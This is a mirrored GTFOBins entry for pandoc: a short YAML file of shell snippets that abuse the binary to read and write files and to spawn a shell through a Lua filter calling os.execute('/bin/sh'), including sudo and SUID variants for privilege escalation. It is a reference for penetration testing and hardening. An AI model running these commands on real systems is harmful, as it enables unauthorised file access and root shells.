mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-27 23:38:29 +01:00
a0be237bf5
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
34 lines
1.0 KiB
Markdown
34 lines
1.0 KiB
Markdown
---
|
|
functions:
|
|
file-read:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
pandoc -t plain "$LFILE"
|
|
file-write:
|
|
- code: |
|
|
LFILE=file_to_write
|
|
echo DATA | pandoc -t plain -o "$LFILE"
|
|
shell:
|
|
- description: Pandoc has a builtin [`lua`](/gtfobins/lua/) interpreter for writing filters, other functions might apply.
|
|
code: |
|
|
TF=$(mktemp)
|
|
echo 'os.execute("/bin/sh")' >$TF
|
|
pandoc -L $TF /dev/null
|
|
suid:
|
|
- code: |
|
|
LFILE=file_to_write
|
|
echo DATA | ./pandoc -t plain -o "$LFILE"
|
|
limited-suid:
|
|
- description: Pandoc has a builtin [`lua`](/gtfobins/lua/) interpreter for writing filters, other functions might apply.
|
|
code: |
|
|
TF=$(mktemp)
|
|
echo 'os.execute("/bin/sh")' >$TF
|
|
./pandoc -L $TF /dev/null
|
|
sudo:
|
|
- description: Pandoc has a builtin [`lua`](/gtfobins/lua/) interpreter for writing filters, other functions might apply.
|
|
code: |
|
|
TF=$(mktemp)
|
|
echo 'os.execute("/bin/sh")' >$TF
|
|
sudo pandoc -L $TF /dev/null
|
|
---
|